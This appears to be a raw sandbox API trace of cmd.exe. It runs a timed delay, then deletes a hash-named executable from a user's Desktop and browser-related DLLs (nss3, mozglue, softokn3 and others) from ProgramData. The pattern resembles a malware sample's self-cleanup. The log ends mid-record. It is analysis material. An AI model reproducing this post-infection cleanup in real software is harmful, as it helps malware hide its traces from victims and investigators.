[0132.902] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0132.902] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0132.902] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0132.902] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0132.902] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0132.902] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0132.902] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0132.902] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0132.902] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0132.902] GetProcessHeap () returned 0x4700000 [0132.902] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x4707b90) returned 1 [0132.902] GetProcessHeap () returned 0x4700000 [0132.902] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xa) returned 0x4708648 [0132.903] lstrcmpW (lpString1="\\timeout.exe", lpString2="\\XCOPY.EXE") returned -1 [0132.903] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\timeout.exe", lpCommandLine="timeout /t 6 ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\ProgramData", lpStartupInfo=0x44ff5f0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="timeout /t 6 ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x44ff63c | out: lpCommandLine="timeout /t 6 ", lpProcessInformation=0x44ff63c*(hProcess=0xa4, hThread=0xa8, dwProcessId=0xc20, dwThreadId=0xfdc)) returned 1 [0133.153] CloseHandle (hObject=0xa8) returned 1 [0133.153] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0133.153] GetProcessHeap () returned 0x4700000 [0133.153] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470c490) returned 1 [0133.153] GetEnvironmentStringsW () returned 0x470c490* [0133.153] GetProcessHeap () returned 0x4700000 [0133.153] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xb30) returned 0x470cfc8 [0133.153] FreeEnvironmentStringsA (penv="=") returned 1 [0133.153] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0139.310] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0x44ff5d4 | out: lpExitCode=0x44ff5d4*=0x0) returned 1 [0139.310] CloseHandle (hObject=0xa4) returned 1 [0139.311] _vsnwprintf (in: _Buffer=0x44ff6bc, _BufferCount=0x13, _Format="%08X", _ArgList=0x44ff5dc | out: _Buffer="00000000") returned 8 [0139.311] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0139.311] GetProcessHeap () returned 0x4700000 [0139.311] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470cfc8) returned 1 [0139.311] GetEnvironmentStringsW () returned 0x470c490* [0139.311] GetProcessHeap () returned 0x4700000 [0139.311] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xb30) returned 0x470cfc8 [0139.311] FreeEnvironmentStringsA (penv="=") returned 1 [0139.311] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0139.311] GetProcessHeap () returned 0x4700000 [0139.311] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470cfc8) returned 1 [0139.311] GetEnvironmentStringsW () returned 0x470c490* [0139.311] GetProcessHeap () returned 0x4700000 [0139.311] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xb30) returned 0x470cfc8 [0139.311] FreeEnvironmentStringsA (penv="=") returned 1 [0139.311] GetProcessHeap () returned 0x4700000 [0139.311] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x4708648) returned 1 [0139.311] DeleteProcThreadAttributeList (in: lpAttributeList=0x44ff668 | out: lpAttributeList=0x44ff668) [0139.311] GetConsoleTitleW (in: lpConsoleTitle=0x44ff950, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0139.314] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0139.314] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0139.314] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0139.314] GetProcessHeap () returned 0x4700000 [0139.314] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x1bc) returned 0x470b330 [0139.314] GetProcessHeap () returned 0x4700000 [0139.314] RtlReAllocateHeap (Heap=0x4700000, Flags=0x0, Ptr=0x470b330, Size=0xe4) returned 0x470b330 [0139.314] GetProcessHeap () returned 0x4700000 [0139.314] RtlSizeHeap (HeapHandle=0x4700000, Flags=0x0, MemoryPointer=0x470b330) returned 0xe4 [0139.314] GetProcessHeap () returned 0x4700000 [0139.315] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xea) returned 0x470b420 [0139.315] GetProcessHeap () returned 0x4700000 [0139.315] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x1bc) returned 0x470b518 [0139.315] GetProcessHeap () returned 0x4700000 [0139.315] RtlReAllocateHeap (Heap=0x4700000, Flags=0x0, Ptr=0x470b518, Size=0xe4) returned 0x470b518 [0139.315] GetProcessHeap () returned 0x4700000 [0139.315] RtlSizeHeap (HeapHandle=0x4700000, Flags=0x0, MemoryPointer=0x470b518) returned 0xe4 [0139.315] GetProcessHeap () returned 0x4700000 [0139.315] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0xce) returned 0x470b608 [0139.315] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x44ff6f8 | out: lpBuffer="C:\\ProgramData") returned 0xe [0139.315] GetProcessHeap () returned 0x4700000 [0139.315] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x38) returned 0x470a170 [0139.315] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x44fe768 | out: lpBuffer="C:\\ProgramData") returned 0xe [0139.315] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x44fe99c, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x44fe9a0, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x44fe99c*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0139.316] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0139.316] GetProcessHeap () returned 0x4700000 [0139.316] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x2c) returned 0x470b6e0 [0139.316] GetProcessHeap () returned 0x4700000 [0139.316] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x258) returned 0x47087c8 [0139.316] _wcsicmp (_String1="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", _String2=".") returned 56 [0139.316] _wcsicmp (_String1="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", _String2="..") returned 56 [0139.316] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe")) returned 0x20 [0139.316] GetProcessHeap () returned 0x4700000 [0139.316] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x210) returned 0x470b718 [0139.316] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x470b720 | out: lpBuffer="C:\\ProgramData") returned 0xe [0139.316] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", nBufferLength=0x104, lpBuffer=0x44fedc8, lpFilePart=0x44fed9c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", lpFilePart=0x44fed9c*="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe") returned 0x62 [0139.316] SetErrorMode (uMode=0x0) returned 0x1 [0139.316] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0139.316] GetProcessHeap () returned 0x4700000 [0139.316] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x258) returned 0x4708a28 [0139.316] _wcsicmp (_String1="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", _String2=".") returned 56 [0139.316] _wcsicmp (_String1="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", _String2="..") returned 56 [0139.316] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe")) returned 0x20 [0139.317] GetProcessHeap () returned 0x4700000 [0139.317] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x92) returned 0x4708c88 [0139.317] GetProcessHeap () returned 0x4700000 [0139.317] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x44) returned 0x4708d28 [0139.317] GetProcessHeap () returned 0x4700000 [0139.317] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x44) returned 0x4708d78 [0139.317] GetProcessHeap () returned 0x4700000 [0139.317] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x808) returned 0x470c490 [0139.317] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", fInfoLevelId=0x0, lpFindFileData=0x470c49c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x470c49c) returned 0x4708dc8 [0139.317] RtlDosPathNameToRelativeNtPathName_U_WithStatus () returned 0x0 [0139.317] NtOpenFile (in: FileHandle=0x44fec9c, DesiredAccess=0x10000, ObjectAttributes=0x44fec64*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x44fec8c, ShareAccess=0x4, OpenOptions=0x5040 | out: FileHandle=0x44fec9c*=0xa8, IoStatusBlock=0x44fec8c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0139.318] RtlReleaseRelativeName () returned 0x44fec7c [0139.318] RtlFreeAnsiString (AnsiString="\\") [0139.318] NtQueryVolumeInformationFile (in: FileHandle=0xa8, IoStatusBlock=0x44febc8, FsInformation=0x44febd0, Length=0x8, FsInformationClass=0x4 | out: IoStatusBlock=0x44febc8, FsInformation=0x44febd0) returned 0x0 [0139.318] CloseHandle (hObject=0xa8) returned 1 [0139.319] FindNextFileW (in: hFindFile=0x4708dc8, lpFindFileData=0x470c49c | out: lpFindFileData=0x470c49c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefda3e80, ftCreationTime.dwHighDateTime=0x1d7b3bc, ftLastAccessTime.dwLowDateTime=0xefda3e80, ftLastAccessTime.dwHighDateTime=0x1d7b3bc, ftLastWriteTime.dwLowDateTime=0x29567e00, ftLastWriteTime.dwHighDateTime=0x1d7b3ac, nFileSizeHigh=0x0, nFileSizeLow=0x192800, dwReserved0=0x0, dwReserved1=0x0, cFileName="f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe", cAlternateFileName="F811CF~1.EXE")) returned 0 [0139.320] GetLastError () returned 0x12 [0139.320] FindClose (in: hFindFile=0x4708dc8 | out: hFindFile=0x4708dc8) returned 1 [0139.320] GetProcessHeap () returned 0x4700000 [0139.320] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470c490) returned 1 [0139.320] GetProcessHeap () returned 0x4700000 [0139.320] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x4708d78) returned 1 [0139.320] GetProcessHeap () returned 0x4700000 [0139.320] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x4708c88) returned 1 [0139.320] GetProcessHeap () returned 0x4700000 [0139.320] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x4708d28) returned 1 [0139.320] GetProcessHeap () returned 0x4700000 [0139.320] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x4708a28) returned 1 [0139.320] GetProcessHeap () returned 0x4700000 [0139.320] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470b718) returned 1 [0139.320] GetProcessHeap () returned 0x4700000 [0139.320] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x47087c8) returned 1 [0139.320] GetProcessHeap () returned 0x4700000 [0139.320] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470b6e0) returned 1 [0139.320] GetProcessHeap () returned 0x4700000 [0139.320] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470a170) returned 1 [0139.320] GetProcessHeap () returned 0x4700000 [0139.320] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470b608) returned 1 [0139.321] GetProcessHeap () returned 0x4700000 [0139.321] RtlFreeHeap (HeapHandle=0x4700000, Flags=0x0, BaseAddress=0x470b518) returned 1 [0139.321] GetConsoleTitleW (in: lpConsoleTitle=0x44ff8f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0139.328] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0139.328] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0139.329] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0139.329] GetProcessHeap () returned 0x4700000 [0139.329] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x64) returned 0x470b518 [0139.329] GetProcessHeap () returned 0x4700000 [0139.329] RtlReAllocateHeap (Heap=0x4700000, Flags=0x0, Ptr=0x470b518, Size=0x34) returned 0x470b518 [0139.329] GetProcessHeap () returned 0x4700000 [0139.329] RtlSizeHeap (HeapHandle=0x4700000, Flags=0x0, MemoryPointer=0x470b518) returned 0x34 [0139.329] GetProcessHeap () returned 0x4700000 [0139.329] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x3e) returned 0x470a170 [0139.329] GetProcessHeap () returned 0x4700000 [0139.329] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x64) returned 0x470b558 [0139.329] GetProcessHeap () returned 0x4700000 [0139.329] RtlReAllocateHeap (Heap=0x4700000, Flags=0x0, Ptr=0x470b558, Size=0x34) returned 0x470b558 [0139.329] GetProcessHeap () returned 0x4700000 [0139.329] RtlSizeHeap (HeapHandle=0x4700000, Flags=0x0, MemoryPointer=0x470b558) returned 0x34 [0139.329] GetProcessHeap () returned 0x4700000 [0139.329] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x32) returned 0x470b598 [0139.329] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x44ff698 | out: lpBuffer="C:\\ProgramData") returned 0xe [0139.329] GetProcessHeap () returned 0x4700000 [0139.329] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x38) returned 0x470b5d8 [0139.329] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x44fe708 | out: lpBuffer="C:\\ProgramData") returned 0xe [0139.329] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x44fe93c, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x44fe940, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x44fe93c*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0139.330] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0139.330] GetProcessHeap () returned 0x4700000 [0139.330] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x2c) returned 0x470b618 [0139.330] GetProcessHeap () returned 0x4700000 [0139.330] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x258) returned 0x470b650 [0139.330] _wcsicmp (_String1="*.dll", _String2=".") returned -4 [0139.330] _wcsicmp (_String1="*.dll", _String2="..") returned -4 [0139.330] GetFileAttributesW (lpFileName="C:\\ProgramData\\*.dll" (normalized: "c:\\programdata\\*.dll")) returned 0xffffffff [0139.330] GetLastError () returned 0x7b [0139.330] GetProcessHeap () returned 0x4700000 [0139.330] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x210) returned 0x47087c8 [0139.330] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x47087d0 | out: lpBuffer="C:\\ProgramData") returned 0xe [0139.330] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\*.dll", nBufferLength=0x104, lpBuffer=0x44fed68, lpFilePart=0x44fed3c | out: lpBuffer="C:\\ProgramData\\*.dll", lpFilePart=0x44fed3c*="*.dll") returned 0x14 [0139.330] SetErrorMode (uMode=0x0) returned 0x1 [0139.330] GetFileAttributesW (lpFileName="C:\\ProgramData" (normalized: "c:\\programdata")) returned 0x12 [0139.330] GetProcessHeap () returned 0x4700000 [0139.330] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x258) returned 0x47089e0 [0139.331] _wcsicmp (_String1="*.dll", _String2=".") returned -4 [0139.331] _wcsicmp (_String1="*.dll", _String2="..") returned -4 [0139.331] GetFileAttributesW (lpFileName="C:\\ProgramData\\*.dll" (normalized: "c:\\programdata\\*.dll")) returned 0xffffffff [0139.331] GetLastError () returned 0x7b [0139.331] GetProcessHeap () returned 0x4700000 [0139.331] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x14) returned 0x4707b10 [0139.331] GetProcessHeap () returned 0x4700000 [0139.331] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x26) returned 0x470b8b0 [0139.331] GetProcessHeap () returned 0x4700000 [0139.331] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x26) returned 0x470b8e0 [0139.331] GetProcessHeap () returned 0x4700000 [0139.331] RtlAllocateHeap (HeapHandle=0x4700000, Flags=0x8, Size=0x808) returned 0x470c490 [0139.331] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\*.dll", fInfoLevelId=0x0, lpFindFileData=0x470c49c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x470c49c) returned 0x470b910 [0139.331] RtlDosPathNameToRelativeNtPathName_U_WithStatus () returned 0x0 [0139.331] NtOpenFile (in: FileHandle=0x44fec3c, DesiredAccess=0x10000, ObjectAttributes=0x44fec04*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\ProgramData\\freebl3.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x44fec2c, ShareAccess=0x4, OpenOptions=0x5040 | out: FileHandle=0x44fec3c*=0xa8, IoStatusBlock=0x44fec2c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0139.331] RtlReleaseRelativeName () returned 0x44fec1c [0139.331] RtlFreeAnsiString (AnsiString="\\") [0139.331] NtQueryVolumeInformationFile (in: FileHandle=0xa8, IoStatusBlock=0x44feb68, FsInformation=0x44feb70, Length=0x8, FsInformationClass=0x4 | out: IoStatusBlock=0x44feb68, FsInformation=0x44feb70) returned 0x0 [0139.332] CloseHandle (hObject=0xa8) returned 1 [0139.335] FindNextFileW (in: hFindFile=0x470b910, lpFindFileData=0x470c49c | out: lpFindFileData=0x470c49c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33a859de, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x33a859de, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x33aaf23c, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x217d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="mozglue.dll", cAlternateFileName="")) returned 1 [0139.335] RtlDosPathNameToRelativeNtPathName_U_WithStatus () returned 0x0 [0139.335] NtOpenFile (in: FileHandle=0x44fec3c, DesiredAccess=0x10000, ObjectAttributes=0x44fec04*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\ProgramData\\mozglue.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x44fec2c, ShareAccess=0x4, OpenOptions=0x5040 | out: FileHandle=0x44fec3c*=0xa8, IoStatusBlock=0x44fec2c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0139.336] RtlReleaseRelativeName () returned 0x44fec1c [0139.336] RtlFreeAnsiString (AnsiString="\\") [0139.336] NtQueryVolumeInformationFile (in: FileHandle=0xa8, IoStatusBlock=0x44feb68, FsInformation=0x44feb70, Length=0x8, FsInformationClass=0x4 | out: IoStatusBlock=0x44feb68, FsInformation=0x44feb70) returned 0x0 [0139.336] CloseHandle (hObject=0xa8) returned 1 [0139.338] FindNextFileW (in: hFindFile=0x470b910, lpFindFileData=0x470c49c | out: lpFindFileData=0x470c49c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33c3aa12, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x33c3aa12, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x33c7bd6b, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x6b738, dwReserved0=0x0, dwReserved1=0x0, cFileName="msvcp140.dll", cAlternateFileName="")) returned 1 [0139.338] RtlDosPathNameToRelativeNtPathName_U_WithStatus () returned 0x0 [0139.338] NtOpenFile (in: FileHandle=0x44fec3c, DesiredAccess=0x10000, ObjectAttributes=0x44fec04*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\ProgramData\\msvcp140.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x44fec2c, ShareAccess=0x4, OpenOptions=0x5040 | out: FileHandle=0x44fec3c*=0xa8, IoStatusBlock=0x44fec2c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0139.338] RtlReleaseRelativeName () returned 0x44fec1c [0139.338] RtlFreeAnsiString (AnsiString="\\") [0139.338] NtQueryVolumeInformationFile (in: FileHandle=0xa8, IoStatusBlock=0x44feb68, FsInformation=0x44feb70, Length=0x8, FsInformationClass=0x4 | out: IoStatusBlock=0x44feb68, FsInformation=0x44feb70) returned 0x0 [0139.338] CloseHandle (hObject=0xa8) returned 1 [0139.342] FindNextFileW (in: hFindFile=0x470b910, lpFindFileData=0x470c49c | out: lpFindFileData=0x470c49c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34350f42, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x34350f42, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x34417200, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x1303d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nss3.dll", cAlternateFileName="")) returned 1 [0139.342] RtlDosPathNameToRelativeNtPathName_U_WithStatus () returned 0x0 [0139.342] NtOpenFile (in: FileHandle=0x44fec3c, DesiredAccess=0x10000, ObjectAttributes=0x44fec04*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\ProgramData\\nss3.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x44fec2c, ShareAccess=0x4, OpenOptions=0x5040 | out: FileHandle=0x44fec3c*=0xa8, IoStatusBlock=0x44fec2c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0139.342] RtlReleaseRelativeName () returned 0x44fec1c [0139.342] RtlFreeAnsiString (AnsiString="\\") [0139.342] NtQueryVolumeInformationFile (in: FileHandle=0xa8, IoStatusBlock=0x44feb68, FsInformation=0x44feb70, Length=0x8, FsInformationClass=0x4 | out: IoStatusBlock=0x44feb68, FsInformation=0x44feb70) returned 0x0 [0139.342] CloseHandle (hObject=0xa8) returned 1 [0139.353] FindNextFileW (in: hFindFile=0x470b910, lpFindFileData=0x470c49c | out: lpFindFileData=0x470c49c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34507287, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x34507287, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x3456e060, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x235d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="softokn3.dll", cAlternateFileName="")) returned 1 [0139.353] RtlDosPathNameToRelativeNtPathName_U_WithStatus () returned 0x0 [0139.353] NtOpenFile (in: FileHandle=0x44fec3c, DesiredAccess=0x10000, ObjectAttributes=0x44fec04*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\ProgramData\\softokn3.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x44fec2c, ShareAccess=0x4, OpenOptions=0x5040 | out: FileHandle=0x44fec3c*=0xa8, IoStatusBlock=0x44fec2c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0139.354] RtlReleaseRelativeName () returned 0x44fec1c [0139.354] RtlFreeAnsiString (AnsiString="\\") [0139.354] NtQueryVolumeInformationFile (in: FileHandle=0xa8, IoStatusBlock=0x44feb68, FsInformation=0x44feb70, Length=0x8, FsInformationClass=0x4 | out: IoStatusBlock=0x44feb68, FsInformation=0x44feb70) returned 0x0 [0139.354] CloseHandle (hObject=0xa8) returned 1 [0139.356] FindNextFileW (in: hFindFile=0x470b910, lpFindFileData=0x470c49c | out: lpFindFileData=0x470c49c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x345eddcd, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x345eddcd, ftLastAccessTime.dwHighDateTime=0x1d7b3bd, ftLastWriteTime.dwLowDateTime=0x345f8d80, ftLastWriteTime.dwHighDateTime=0x1d7b3bd, nFileSizeHigh=0x0, nFileSizeLow=0x14748, dwReserved0=0x0, dwReserved1=0x0, cFileName="vcruntime140.dll", cAlternateFileName="VCRUNT~1.DLL")) returned 1 [0139.357] RtlDosPathNameToRelativeNtPathName_U_WithStatus () returned 0x0 [0139.357] NtOpenFile (in: FileHandle=0x44fec3c, DesiredAccess=0x10000, ObjectAttributes=0x44fec04*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\ProgramData\\vcruntime140.dll", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x44fec2c, ShareAccess=0x4, OpenOptions=0x5040 | out: FileHandle=0x44fec3c*=0xa8, IoStatusBlock=0x44fec2c*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0139.357] RtlReleaseRelativeName () returned 0x44fec1c [0139.357] RtlFreeAnsiString (AnsiString="\\") [0139.357] NtQueryVolumeInformationFile (in: FileHandle=0xa8, IoStatusBlock=0x44feb68, FsInformation=0x44feb70, Length=0x8, FsInformationClass=0x4 | out: IoStatusBlock=0x44feb68, FsInformation=0x44feb70) returned 0x0 [0139.357] CloseHandle (hObject=0xa8) returned 1 [0139.359] FindNextFileW (in: hFindFile=0x470b910, lpFindFileData=0x470c49c | out: lpFindFileData=0x470c49c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x345eddcd, ftCreationTime.dwHighDateTime=0x1d7b3bd, ftLastAccessTime.dwLowDateTime=0x345eddcd, 